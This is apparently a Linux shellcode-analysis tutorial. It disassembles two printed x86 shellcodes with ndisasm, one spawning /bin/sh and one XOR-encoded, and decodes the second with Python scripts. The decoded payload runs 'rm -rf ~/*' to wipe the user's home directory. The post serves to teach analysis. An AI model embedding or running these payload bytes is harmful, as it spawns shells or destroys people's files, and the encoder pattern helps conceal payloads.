
Shellcode analysis and debugging techniques

Date: 2017/3/1 11:15:26   Column: SHELL Programming

Below we analyse the functionality of a few existing shellcodes; working through them shows the techniques used to analyse shellcode.

The first shellcode is as follows:

    static char shellcode[]=
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";

Disassembling it with ndisasm gives the following:

    root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
    00000000 EB17 jmp short 0x19
    00000002 5E pop esi
    00000003 897608 mov [esi+0x8],esi
    00000006 31C0 xor eax,eax
    00000008 884607 mov [esi+0x7],al
    0000000B 89460C mov [esi+0xc],eax
    0000000E B00B mov al,0xb
    00000010 89F3 mov ebx,esi
    00000012 8D4E08 lea ecx,[esi+0x8]
    00000015 31D2 xor edx,edx
    00000017 CD80 int 0x80
    00000019 E8E4FFFFFF call dword 0x2
    0000001E 2F das
    0000001F 62696E bound ebp,[ecx+0x6e]
    00000022 2F das
    00000023 7368 jnc 0x8d
    00000025 58 pop eax
    root@linux:~/pentest#

It is clear that this is a shellcode that executes "/bin/sh": the jmp/call/pop sequence leaves esi pointing at the "/bin/shX" bytes at the end of the buffer (which ndisasm renders as meaningless instructions from offset 0x1e), the code then zeroes the byte at [esi+0x7] to terminate the string, stores the string's address at [esi+0x8] as argv[0] and a NULL at [esi+0xc], loads the execve syscall number 0xb into al, and issues int 0x80 with ebx = path, ecx = argv and edx = NULL.

The second shellcode is as follows:

    char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";

Disassembling it with ndisasm gives the following:

    root@linux:~/pentest# echo -ne "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
    00000000 EB10 jmp short 0x12
    00000002 5E pop esi
    00000003 31C9 xor ecx,ecx
    00000005 B14B mov cl,0x4b
    00000007 B0FF mov al,0xff
    00000009 3006 xor [esi],al
    0000000B FEC8 dec al
    0000000D 46 inc esi
    0000000E E2F9 loop 0x9
    00000010 EB05 jmp short 0x17
    00000012 E8EBFFFFFF call dword 0x2
    00000017 17 pop ss
    00000018 DB db 0xdb
    00000019 FD std
    0000001A FC cld
    0000001B FB sti
    0000001C D59B aad 0x9b
    0000001E 91 xchg eax,ecx
    0000001F 99 cdq
    00000020 D9869CF38199 fld dword [esi-0x667e0c64]
    00000026 F0C28DED lock ret 0xed8d
    0000002A 9E sahf
    0000002B 86CA xchg cl,dl
    0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
    00000033 C9 leave
    00000034 C2D3DE ret 0xded3
    00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
    0000003D AC lodsb
    0000003E B4BB mov ah,0xbb
    00000040 D6 salc
    00000041 88E5 mov ch,ah
    00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
    00000049 40 inc eax
    0000004A 91 xchg eax,ecx
    0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
    00000052 2F das
    00000053 4A dec edx
    00000054 23F0 and esi,eax
    00000056 120F adc cl,[edi]
    00000058 B570 mov ch,0x70
    0000005A 3C32 cmp al,0x32
    0000005C 7988 jns 0xffffffe6
    0000005E 78F7 js 0x57
    00000060 7B35 jpo 0x97
    root@linux:~/pentest#

Only the first 0x17 bytes are real code: a decoder loop that XORs the 0x4b bytes that follow with a key starting at 0xff and decremented after every byte. Next, we use a Python script together with hexdump to decode and analyse this shellcode.

    root@linux:~/pentest# cat decode.py
    #!/usr/bin/env python
    sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
    "\x7b\x35"
    print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
    root@linux:~/pentest# ./decode.py | hexdump -C
    00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
    00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
    00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
    00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
    00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
    0000004c
    root@linux:~/pentest#

The strings "/bin/sh", "sh", "-c" and "rm -rf ~/* 2>/dev/null" are now visible (the trailing 0a byte is just the newline added by print). Next we analyse the decoded bytes with ndisasm. Note that the decoded payload opens with a call that jumps over this string block, so the real code begins at the call target, 0x2a; the instructions ndisasm prints for the string bytes in between are meaningless, and the listing only realigns at the push ebx at 0x31, after which the argv array is built on the stack and execve (al = 0xb) followed by exit (eax = 1) are invoked:

    root@linux:~/pentest# ./decode.py | ndisasm -u -
    00000000 E825000000 call dword 0x2a
    00000005 2F das
    00000006 62696E bound ebp,[ecx+0x6e]
    00000009 2F das
    0000000A 7368 jnc 0x74
    0000000C 007368 add [ebx+0x68],dh
    0000000F 002D6300726D add [dword 0x6d720063],ch
    00000015 202D7266207E and [dword 0x7e206672],ch
    0000001B 2F das
    0000001C 2A20 sub ah,[eax]
    0000001E 323E xor bh,[esi]
    00000020 2F das
    00000021 6465762F gs jna 0x54
    00000025 6E outsb
    00000026 756C jnz 0x94
    00000028 6C insb
    00000029 005D31 add [ebp+0x31],bl
    0000002C C0508D5D rcl byte [eax-0x73],0x5d
    00000030 0E push cs
    00000031 53 push ebx
    00000032 8D5D0B lea ebx,[ebp+0xb]
    00000035 53 push ebx
    00000036 8D5D08 lea ebx,[ebp+0x8]
    00000039 53 push ebx
    0000003A 89EB mov ebx,ebp
    0000003C 89E1 mov ecx,esp
    0000003E 31D2 xor edx,edx
    00000040 B00B mov al,0xb
    00000042 CD80 int 0x80
    00000044 89C3 mov ebx,eax
    00000046 31C0 xor eax,eax
    00000048 40 inc eax
    00000049 CD80 int 0x80
    0000004B 0A db 0x0a
    root@linux:~/pentest#
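As an added example (not code from the article), the Python 3 script below generalises decode.py: instead of hard-coding the offset 0x17, count 0x4b and key 0xff, it reads them from the decoder stub, replays the stub's decrementing-key XOR loop, and then follows the call/pop string block of the decoded payload to recover the execve() path and argv. The fixed stub layout it checks for and the helper names are this example's own assumptions.

```python
# Added example (not from the original article): replay the second shellcode's
# own decoder stub and recover the execve() arguments it hides.
import struct

# shellcode2 exactly as printed in the article.
SHELLCODE2 = bytes.fromhex(
    "eb105e31c9b14bb0ff3006fec846e2f9" "eb05e8ebffffff17dbfdfcfbd59b9199"
    "d9869cf38199f0c28ded9e86cac49a81" "c69bcbc9c2d3def0bab8aaf4b4acb4bb"
    "d688e513825c8dc19d4091c0994495cf" "954c2f4a23f0120fb5703c32798878f7"
    "7b35")

def parse_decoder_stub(sc):
    """Return (payload_offset, byte_count, initial_key) for the stub in the
    listing: jmp / pop esi / xor ecx,ecx / mov cl,N / mov al,K / xor [esi],al ;
    dec al ; inc esi ; loop.  Assuming this exact layout is the example's choice."""
    if (sc[0] != 0xEB or sc[2:5] != b"\x5e\x31\xc9" or sc[5] != 0xB1
            or sc[7] != 0xB0 or sc[9:16] != b"\x30\x06\xfe\xc8\x46\xe2\xf9"):
        raise ValueError("decoder stub layout not recognised")
    count, key = sc[6], sc[8]          # immediates of mov cl,N / mov al,K
    call_at = 2 + sc[1]                # jmp short target: the 'call' back
    if sc[call_at] != 0xE8:
        raise ValueError("expected call rel32 at jmp target")
    return call_at + 5, count, key     # encoded bytes follow the 5-byte call

def xor_decode(enc, key):
    """Emulate the loop: XOR each byte with al, then decrement al (8-bit wrap)."""
    out = bytearray()
    for b in enc:
        out.append(b ^ key)
        key = (key - 1) & 0xFF
    return bytes(out)

def extract_execve_args(payload):
    """The decoded payload opens with a 'call rel32' that skips a block of
    NUL-terminated strings (path, argv...).  Return (strings, code_offset)."""
    if payload[0] != 0xE8:
        raise ValueError("decoded payload does not start with call")
    code_off = 5 + struct.unpack("<i", payload[1:5])[0]
    strings = payload[5:code_off].split(b"\x00")
    return [s.decode("ascii") for s in strings if s], code_off

def analyse(sc):
    off, count, key = parse_decoder_stub(sc)
    payload = xor_decode(sc[off:off + count], key)
    args, code_off = extract_execve_args(payload)
    return {"payload": payload, "argv": args, "code_offset": code_off}

if __name__ == "__main__":
    r = analyse(SHELLCODE2)
    print("code starts at 0x%x; execve() path and argv: %r" % (r["code_offset"], r["argv"]))
```

Feeding the returned payload to ndisasm with `-e` set to the reported code offset skips the string block and gives an aligned listing of the execve/exit sequence.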
